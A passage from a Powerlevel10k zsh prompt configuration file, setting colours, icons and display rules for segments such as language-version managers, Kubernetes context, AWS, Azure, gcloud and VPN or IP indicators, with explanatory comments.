typeset -g POWERLEVEL9K_PYENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide python version if it's equal to "system".
typeset -g POWERLEVEL9K_PYENV_SHOW_SYSTEM=true
# Pyenv segment format. The following parameters are available within the expansion.
#
# - P9K_CONTENT Current pyenv environment (pyenv version-name).
# - P9K_PYENV_PYTHON_VERSION Current python version (python --version).
#
# The default format has the following logic:
#
# 1. Display "$P9K_CONTENT $P9K_PYENV_PYTHON_VERSION" if $P9K_PYENV_PYTHON_VERSION is not
# empty and unequal to $P9K_CONTENT.
# 2. Otherwise display just "$P9K_CONTENT".
typeset -g POWERLEVEL9K_PYENV_CONTENT_EXPANSION='${P9K_CONTENT}${${P9K_PYENV_PYTHON_VERSION:#$P9K_CONTENT}:+ $P9K_PYENV_PYTHON_VERSION}'
# Custom icon.
# typeset -g POWERLEVEL9K_PYENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ goenv: go environment (https://github.com/syndbg/goenv) ]################
# Goenv color.
# typeset -g POWERLEVEL9K_GOENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_GOENV_BACKGROUND=4
# Hide go version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_GOENV_SOURCES=(shell local global)
# If set to false, hide go version if it's the same as global:
# $(goenv version-name) == $(goenv global).
typeset -g POWERLEVEL9K_GOENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide go version if it's equal to "system".
typeset -g POWERLEVEL9K_GOENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_GOENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ nodenv: node.js version from nodenv (https://github.com/nodenv/nodenv) ]##########
# Nodenv color.
# typeset -g POWERLEVEL9K_NODENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_NODENV_BACKGROUND=0
# Hide node version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_NODENV_SOURCES=(shell local global)
# If set to false, hide node version if it's the same as global:
# $(nodenv version-name) == $(nodenv global).
typeset -g POWERLEVEL9K_NODENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide node version if it's equal to "system".
typeset -g POWERLEVEL9K_NODENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_NODENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############[ nvm: node.js version from nvm (https://github.com/nvm-sh/nvm) ]###############
# Nvm color.
# typeset -g POWERLEVEL9K_NVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_NVM_BACKGROUND=5
# Custom icon.
# typeset -g POWERLEVEL9K_NVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
############[ nodeenv: node.js environment (https://github.com/ekalinin/nodeenv) ]############
# Nodeenv color.
# typeset -g POWERLEVEL9K_NODEENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_NODEENV_BACKGROUND=0
# Don't show Node version next to the environment name.
typeset -g POWERLEVEL9K_NODEENV_SHOW_NODE_VERSION=false
# Separate environment name from Node version only with a space.
typeset -g POWERLEVEL9K_NODEENV_{LEFT,RIGHT}_DELIMITER=
# Custom icon.
# typeset -g POWERLEVEL9K_NODEENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############################[ node_version: node.js version ]###############################
# Node version color.
# typeset -g POWERLEVEL9K_NODE_VERSION_FOREGROUND=7
# typeset -g POWERLEVEL9K_NODE_VERSION_BACKGROUND=2
# Show node version only when in a directory tree containing package.json.
typeset -g POWERLEVEL9K_NODE_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_NODE_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ go_version: go version (https://golang.org) ]########################
# Go version color.
# typeset -g POWERLEVEL9K_GO_VERSION_FOREGROUND=255
# typeset -g POWERLEVEL9K_GO_VERSION_BACKGROUND=2
# Show go version only when in a go project subdirectory.
typeset -g POWERLEVEL9K_GO_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_GO_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#################[ rust_version: rustc version (https://www.rust-lang.org) ]##################
# Rust version color.
# typeset -g POWERLEVEL9K_RUST_VERSION_FOREGROUND=0
# typeset -g POWERLEVEL9K_RUST_VERSION_BACKGROUND=208
# Show rust version only when in a rust project subdirectory.
typeset -g POWERLEVEL9K_RUST_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_RUST_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ dotnet_version: .NET version (https://dotnet.microsoft.com) ]################
# .NET version color.
# typeset -g POWERLEVEL9K_DOTNET_VERSION_FOREGROUND=7
# typeset -g POWERLEVEL9K_DOTNET_VERSION_BACKGROUND=5
# Show .NET version only when in a .NET project subdirectory.
typeset -g POWERLEVEL9K_DOTNET_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_DOTNET_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################[ php_version: php version (https://www.php.net/) ]######################
# PHP version color.
typeset -g POWERLEVEL9K_PHP_VERSION_FOREGROUND=0
typeset -g POWERLEVEL9K_PHP_VERSION_BACKGROUND=5
# Show PHP version only when in a PHP project subdirectory.
typeset -g POWERLEVEL9K_PHP_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_PHP_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ laravel_version: laravel php framework version (https://laravel.com/) ]###########
# Laravel version color.
typeset -g POWERLEVEL9K_LARAVEL_VERSION_FOREGROUND=1
typeset -g POWERLEVEL9K_LARAVEL_VERSION_BACKGROUND=7
# Custom icon.
# typeset -g POWERLEVEL9K_LARAVEL_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#############[ rbenv: ruby version from rbenv (https://github.com/rbenv/rbenv) ]##############
# Rbenv color.
# typeset -g POWERLEVEL9K_RBENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_RBENV_BACKGROUND=1
# Hide ruby version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_RBENV_SOURCES=(shell local global)
# If set to false, hide ruby version if it's the same as global:
# $(rbenv version-name) == $(rbenv global).
typeset -g POWERLEVEL9K_RBENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide ruby version if it's equal to "system".
typeset -g POWERLEVEL9K_RBENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_RBENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
####################[ java_version: java version (https://www.java.com/) ]####################
# Java version color.
typeset -g POWERLEVEL9K_JAVA_VERSION_FOREGROUND=1
typeset -g POWERLEVEL9K_JAVA_VERSION_BACKGROUND=7
# Show java version only when in a java project subdirectory.
typeset -g POWERLEVEL9K_JAVA_VERSION_PROJECT_ONLY=true
# Show brief version.
typeset -g POWERLEVEL9K_JAVA_VERSION_FULL=false
# Custom icon.
# typeset -g POWERLEVEL9K_JAVA_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
###[ package: name@version from package.json (https://docs.npmjs.com/files/package.json) ]####
# Package color.
# typeset -g POWERLEVEL9K_PACKAGE_FOREGROUND=0
# typeset -g POWERLEVEL9K_PACKAGE_BACKGROUND=6
# Package format. The following parameters are available within the expansion.
#
# - P9K_PACKAGE_NAME The value of `name` field in package.json.
# - P9K_PACKAGE_VERSION The value of `version` field in package.json.
#
# typeset -g POWERLEVEL9K_PACKAGE_CONTENT_EXPANSION='${P9K_PACKAGE_NAME//\%/%%}@${P9K_PACKAGE_VERSION//\%/%%}'
# Custom icon.
# typeset -g POWERLEVEL9K_PACKAGE_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ rvm: ruby version from rvm (https://rvm.io) ]########################
# Rvm color.
# typeset -g POWERLEVEL9K_RVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_RVM_BACKGROUND=240
# Don't show @gemset at the end.
typeset -g POWERLEVEL9K_RVM_SHOW_GEMSET=false
# Don't show ruby- at the front.
typeset -g POWERLEVEL9K_RVM_SHOW_PREFIX=false
# Custom icon.
# typeset -g POWERLEVEL9K_RVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ fvm: flutter version management (https://github.com/leoafarias/fvm) ]############
# Fvm color.
# typeset -g POWERLEVEL9K_FVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_FVM_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_FVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ luaenv: lua version from luaenv (https://github.com/cehoffman/luaenv) ]###########
# Lua color.
# typeset -g POWERLEVEL9K_LUAENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_LUAENV_BACKGROUND=4
# Hide lua version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_LUAENV_SOURCES=(shell local global)
# If set to false, hide lua version if it's the same as global:
# $(luaenv version-name) == $(luaenv global).
typeset -g POWERLEVEL9K_LUAENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide lua version if it's equal to "system".
typeset -g POWERLEVEL9K_LUAENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_LUAENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ jenv: java version from jenv (https://github.com/jenv/jenv) ]################
# Java color.
# typeset -g POWERLEVEL9K_JENV_FOREGROUND=1
# typeset -g POWERLEVEL9K_JENV_BACKGROUND=7
# Hide java version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_JENV_SOURCES=(shell local global)
# If set to false, hide java version if it's the same as global:
# $(jenv version-name) == $(jenv global).
typeset -g POWERLEVEL9K_JENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide java version if it's equal to "system".
typeset -g POWERLEVEL9K_JENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_JENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ plenv: perl version from plenv (https://github.com/tokuhirom/plenv) ]############
# Perl color.
# typeset -g POWERLEVEL9K_PLENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PLENV_BACKGROUND=4
# Hide perl version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PLENV_SOURCES=(shell local global)
# If set to false, hide perl version if it's the same as global:
# $(plenv version-name) == $(plenv global).
typeset -g POWERLEVEL9K_PLENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide perl version if it's equal to "system".
typeset -g POWERLEVEL9K_PLENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_PLENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
############[ phpenv: php version from phpenv (https://github.com/phpenv/phpenv) ]############
# PHP color.
# typeset -g POWERLEVEL9K_PHPENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PHPENV_BACKGROUND=5
# Hide php version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PHPENV_SOURCES=(shell local global)
# If set to false, hide php version if it's the same as global:
# $(phpenv version-name) == $(phpenv global).
typeset -g POWERLEVEL9K_PHPENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide PHP version if it's equal to "system".
typeset -g POWERLEVEL9K_PHPENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_PHPENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######[ scalaenv: scala version from scalaenv (https://github.com/scalaenv/scalaenv) ]#######
# Scala color.
# typeset -g POWERLEVEL9K_SCALAENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_SCALAENV_BACKGROUND=1
# Hide scala version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_SCALAENV_SOURCES=(shell local global)
# If set to false, hide scala version if it's the same as global:
# $(scalaenv version-name) == $(scalaenv global).
typeset -g POWERLEVEL9K_SCALAENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide scala version if it's equal to "system".
typeset -g POWERLEVEL9K_SCALAENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_SCALAENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ haskell_stack: haskell version from stack (https://haskellstack.org/) ]###########
# Haskell color.
# typeset -g POWERLEVEL9K_HASKELL_STACK_FOREGROUND=0
# typeset -g POWERLEVEL9K_HASKELL_STACK_BACKGROUND=3
# Hide haskell version if it doesn't come from one of these sources.
#
# shell: version is set by STACK_YAML
# local: version is set by stack.yaml up the directory tree
# global: version is set by the implicit global project (~/.stack/global-project/stack.yaml)
typeset -g POWERLEVEL9K_HASKELL_STACK_SOURCES=(shell local)
# If set to false, hide haskell version if it's the same as in the implicit global project.
typeset -g POWERLEVEL9K_HASKELL_STACK_ALWAYS_SHOW=true
# Custom icon.
# typeset -g POWERLEVEL9K_HASKELL_STACK_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ terraform: terraform workspace (https://www.terraform.io) ]#################
# Don't show terraform workspace if it's literally "default".
typeset -g POWERLEVEL9K_TERRAFORM_SHOW_DEFAULT=false
# POWERLEVEL9K_TERRAFORM_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current terraform workspace gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_TERRAFORM_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_TERRAFORM_CLASSES defines the workspace class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_TERRAFORM_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' OTHER)
#
# If your current terraform workspace is "project_test", its class is TEST because "project_test"
# doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_FOREGROUND=2
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_BACKGROUND=0
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_TERRAFORM_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' OTHER)
typeset -g POWERLEVEL9K_TERRAFORM_OTHER_FOREGROUND=4
typeset -g POWERLEVEL9K_TERRAFORM_OTHER_BACKGROUND=0
# typeset -g POWERLEVEL9K_TERRAFORM_OTHER_VISUAL_IDENTIFIER_EXPANSION='⭐'
#############[ kubecontext: current kubernetes context (https://kubernetes.io/) ]#############
# Show kubecontext only when the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show kubecontext.
typeset -g POWERLEVEL9K_KUBECONTEXT_SHOW_ON_COMMAND='kubectl|helm|kubens|kubectx|oc|istioctl|kogito|k9s|helmfile'
# Kubernetes context classes for the purpose of using different colors, icons and expansions with
# different contexts.
#
# POWERLEVEL9K_KUBECONTEXT_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current kubernetes context gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_KUBECONTEXT_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_KUBECONTEXT_CLASSES defines the context class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_KUBECONTEXT_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' DEFAULT)
#
# If your current kubernetes context is "deathray-testing/default", its class is TEST
# because "deathray-testing/default" doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_FOREGROUND=0
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_BACKGROUND=2
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_KUBECONTEXT_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_FOREGROUND=7
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_BACKGROUND=5
# typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use POWERLEVEL9K_KUBECONTEXT_CONTENT_EXPANSION to specify the content displayed by kubecontext
# segment. Parameter expansions are very flexible and fast, too. See reference:
# http://zsh.sourceforge.net/Doc/Release/Expansion.html#Parameter-Expansion.
#
# Within the expansion the following parameters are always available:
#
# - P9K_CONTENT The content that would've been displayed if there was no content
# expansion defined.
# - P9K_KUBECONTEXT_NAME The current context's name. Corresponds to column NAME in the
# output of `kubectl config get-contexts`.
# - P9K_KUBECONTEXT_CLUSTER The current context's cluster. Corresponds to column CLUSTER in the
# output of `kubectl config get-contexts`.
# - P9K_KUBECONTEXT_NAMESPACE The current context's namespace. Corresponds to column NAMESPACE
# in the output of `kubectl config get-contexts`. If there is no
# namespace, the parameter is set to "default".
# - P9K_KUBECONTEXT_USER The current context's user. Corresponds to column AUTHINFO in the
# output of `kubectl config get-contexts`.
#
# If the context points to Google Kubernetes Engine (GKE) or Elastic Kubernetes Service (EKS),
# the following extra parameters are available:
#
# - P9K_KUBECONTEXT_CLOUD_NAME Either "gke" or "eks".
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT Account/project ID.
# - P9K_KUBECONTEXT_CLOUD_ZONE Availability zone.
# - P9K_KUBECONTEXT_CLOUD_CLUSTER Cluster.
#
# P9K_KUBECONTEXT_CLOUD_* parameters are derived from P9K_KUBECONTEXT_CLUSTER. For example,
# if P9K_KUBECONTEXT_CLUSTER is "gke_my-account_us-east1-a_my-cluster-01":
#
# - P9K_KUBECONTEXT_CLOUD_NAME=gke
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT=my-account
# - P9K_KUBECONTEXT_CLOUD_ZONE=us-east1-a
# - P9K_KUBECONTEXT_CLOUD_CLUSTER=my-cluster-01
#
# If P9K_KUBECONTEXT_CLUSTER is "arn:aws:eks:us-east-1:123456789012:cluster/my-cluster-01":
#
# - P9K_KUBECONTEXT_CLOUD_NAME=eks
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT=123456789012
# - P9K_KUBECONTEXT_CLOUD_ZONE=us-east-1
# - P9K_KUBECONTEXT_CLOUD_CLUSTER=my-cluster-01
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION=
# Show P9K_KUBECONTEXT_CLOUD_CLUSTER if it's not empty and fall back to P9K_KUBECONTEXT_NAME.
POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION+='${P9K_KUBECONTEXT_CLOUD_CLUSTER:-${P9K_KUBECONTEXT_NAME}}'
# Append the current context's namespace if it's not "default".
POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION+='${${:-/$P9K_KUBECONTEXT_NAMESPACE}:#/default}'
# Custom prefix.
# typeset -g POWERLEVEL9K_KUBECONTEXT_PREFIX='at '
#[ aws: aws profile (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html) ]#
# Show aws only when the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show aws.
typeset -g POWERLEVEL9K_AWS_SHOW_ON_COMMAND='aws|awless|terraform|pulumi|terragrunt'
# POWERLEVEL9K_AWS_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current AWS profile gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_AWS_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_AWS_CLASSES defines the profile class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_AWS_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' DEFAULT)
#
# If your current AWS profile is "company_test", its class is TEST
# because "company_test" doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_AWS_TEST_FOREGROUND=28
# typeset -g POWERLEVEL9K_AWS_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_AWS_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_AWS_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
# typeset -g POWERLEVEL9K_AWS_DEFAULT_FOREGROUND=7
# typeset -g POWERLEVEL9K_AWS_DEFAULT_BACKGROUND=1
# typeset -g POWERLEVEL9K_AWS_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ aws_eb_env: aws elastic beanstalk environment (https://aws.amazon.com/elasticbeanstalk/) ]#
# AWS Elastic Beanstalk environment color.
# typeset -g POWERLEVEL9K_AWS_EB_ENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_AWS_EB_ENV_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_AWS_EB_ENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ azure: azure account name (https://docs.microsoft.com/en-us/cli/azure) ]##########
# Show azure only when the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show azure.
typeset -g POWERLEVEL9K_AZURE_SHOW_ON_COMMAND='az|terraform|pulumi|terragrunt'
# Azure account name color.
# typeset -g POWERLEVEL9K_AZURE_FOREGROUND=7
# typeset -g POWERLEVEL9K_AZURE_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_AZURE_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ gcloud: google cloud account and project (https://cloud.google.com/) ]###########
# Show gcloud only when the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show gcloud.
typeset -g POWERLEVEL9K_GCLOUD_SHOW_ON_COMMAND='gcloud|gcs'
# Google cloud color.
# typeset -g POWERLEVEL9K_GCLOUD_FOREGROUND=7
# typeset -g POWERLEVEL9K_GCLOUD_BACKGROUND=4
# Google cloud format. Change the value of POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION and/or
# POWERLEVEL9K_GCLOUD_COMPLETE_CONTENT_EXPANSION if the default is too verbose or not informative
# enough. You can use the following parameters in the expansions. Each of them corresponds to the
# output of `gcloud` tool.
#
# Parameter | Source
# -------------------------|--------------------------------------------------------------------
# P9K_GCLOUD_CONFIGURATION | gcloud config configurations list --format='value(name)'
# P9K_GCLOUD_ACCOUNT | gcloud config get-value account
# P9K_GCLOUD_PROJECT_ID | gcloud config get-value project
# P9K_GCLOUD_PROJECT_NAME | gcloud projects describe $P9K_GCLOUD_PROJECT_ID --format='value(name)'
#
# Note: ${VARIABLE//\%/%%} expands to ${VARIABLE} with all occurrences of '%' replaced with '%%'.
#
# Obtaining project name requires sending a request to Google servers. This can take a long time
# and even fail. When project name is unknown, P9K_GCLOUD_PROJECT_NAME is not set and gcloud
# prompt segment is in state PARTIAL. When project name gets known, P9K_GCLOUD_PROJECT_NAME gets
# set and gcloud prompt segment transitions to state COMPLETE.
#
# You can customize the format, icon and colors of gcloud segment separately for states PARTIAL
# and COMPLETE. You can also hide gcloud in state PARTIAL by setting
# POWERLEVEL9K_GCLOUD_PARTIAL_VISUAL_IDENTIFIER_EXPANSION and
# POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION to empty.
typeset -g POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION='${P9K_GCLOUD_PROJECT_ID//\%/%%}'
typeset -g POWERLEVEL9K_GCLOUD_COMPLETE_CONTENT_EXPANSION='${P9K_GCLOUD_PROJECT_NAME//\%/%%}'
# Send a request to Google (by means of `gcloud projects describe ...`) to obtain project name
# this often. Negative value disables periodic polling. In this mode project name is retrieved
# only when the current configuration, account or project id changes.
typeset -g POWERLEVEL9K_GCLOUD_REFRESH_PROJECT_NAME_SECONDS=60
# Custom icon.
# typeset -g POWERLEVEL9K_GCLOUD_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ google_app_cred: google application credentials (https://cloud.google.com/docs/authentication/production) ]#
# Show google_app_cred only when the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show google_app_cred.
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_SHOW_ON_COMMAND='terraform|pulumi|terragrunt'
# Google application credentials classes for the purpose of using different colors, icons and
# expansions with different credentials.
#
# POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES is an array with even number of elements. The first
# element in each pair defines a pattern against which the current kubernetes context gets
# matched. More specifically, it's P9K_CONTENT prior to the application of context expansion
# (see below) that gets matched. If you unset all POWERLEVEL9K_GOOGLE_APP_CRED_*CONTENT_EXPANSION
# parameters, you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES defines the context class. Patterns are tried in order.
# The first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES=(
# '*:*prod*:*' PROD
# '*:*test*:*' TEST
# '*' DEFAULT)
#
# If your current Google application credentials is "service_account deathray-testing x@y.com",
# its class is TEST because it doesn't match the pattern '* *prod* *' but does match '* *test* *'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_FOREGROUND=28
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_CONTENT_EXPANSION='$P9K_GOOGLE_APP_CRED_PROJECT_ID'
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES=(
# '*:*prod*:*' PROD # These values are examples that are unlikely
# '*:*test*:*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_FOREGROUND=7
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_BACKGROUND=4
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use POWERLEVEL9K_GOOGLE_APP_CRED_CONTENT_EXPANSION to specify the content displayed by
# google_app_cred segment. Parameter expansions are very flexible and fast, too. See reference:
# http://zsh.sourceforge.net/Doc/Release/Expansion.html#Parameter-Expansion.
#
# You can use the following parameters in the expansion. Each of them corresponds to one of the
# fields in the JSON file pointed to by GOOGLE_APPLICATION_CREDENTIALS.
#
# Parameter | JSON key file field
# ---------------------------------+---------------
# P9K_GOOGLE_APP_CRED_TYPE | type
# P9K_GOOGLE_APP_CRED_PROJECT_ID | project_id
# P9K_GOOGLE_APP_CRED_CLIENT_EMAIL | client_email
#
# Note: ${VARIABLE//\%/%%} expands to ${VARIABLE} with all occurrences of '%' replaced by '%%'.
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_CONTENT_EXPANSION='${P9K_GOOGLE_APP_CRED_PROJECT_ID//\%/%%}'
###############################[ public_ip: public IP address ]###############################
# Public IP color.
# typeset -g POWERLEVEL9K_PUBLIC_IP_FOREGROUND=7
# typeset -g POWERLEVEL9K_PUBLIC_IP_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_PUBLIC_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
########################[ vpn_ip: virtual private network indicator ]#########################
# VPN IP color.
# typeset -g POWERLEVEL9K_VPN_IP_FOREGROUND=0
# typeset -g POWERLEVEL9K_VPN_IP_BACKGROUND=6
# When on VPN, show just an icon without the IP address.
# Tip: To display the private IP address when on VPN, remove the next line.
typeset -g POWERLEVEL9K_VPN_IP_CONTENT_EXPANSION=
# Regular expression for the VPN network interface. Run `ifconfig` or `ip -4 a show` while on VPN
# to see the name of the interface.
typeset -g POWERLEVEL9K_VPN_IP_INTERFACE='(gpd|wg|(.*tun))[0-9]*'
# If set to true, show one segment per matching network interface. If set to false, show only
# one segment corresponding to the first matching network interface.
# Tip: If you set it to true, you'll probably want to unset POWERLEVEL9K_VPN_IP_CONTENT_EXPANSION.
typeset -g POWERLEVEL9K_VPN_IP_SHOW_ALL=false
# Custom icon.
# typeset -g POWERLEVEL9K_VPN_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ ip: ip address and bandwidth usage for a specified network interface ]###########
# IP color.
typeset -g POWERLEVEL9K_IP_BACKGROUND=4
typeset -g POWERLEVEL9K_IP_FOREGROUND=0
# The following parameters are accessible within the expansion:
#
# Parameter | Meaning
# ----------------------+---------------
# P9K_IP_IP | IP address
# P9K_IP_INTERFACE | network interface
# P9K_IP_RX_BYTES | total number of bytes received
# P9K_IP_TX_BYTES | total number of bytes sent
# P9K_IP_RX_RATE | receive rate (since last prompt)
# P9K_IP_TX_RATE | send rate (since last prompt)
typeset -g POWERLEVEL9K_IP_CONTENT_EXPANSION='${P9K_IP_RX_RATE:+⇣$P9K_IP_RX_RATE }${P9K_IP_TX_RATE:+⇡$P9K_IP_TX_RATE }$P9K_IP_IP'
# Show information for the first network interface whose name matches this regular expression.
# Run `ifconfig` or `ip -4 a show` to see the names of all network interfaces.
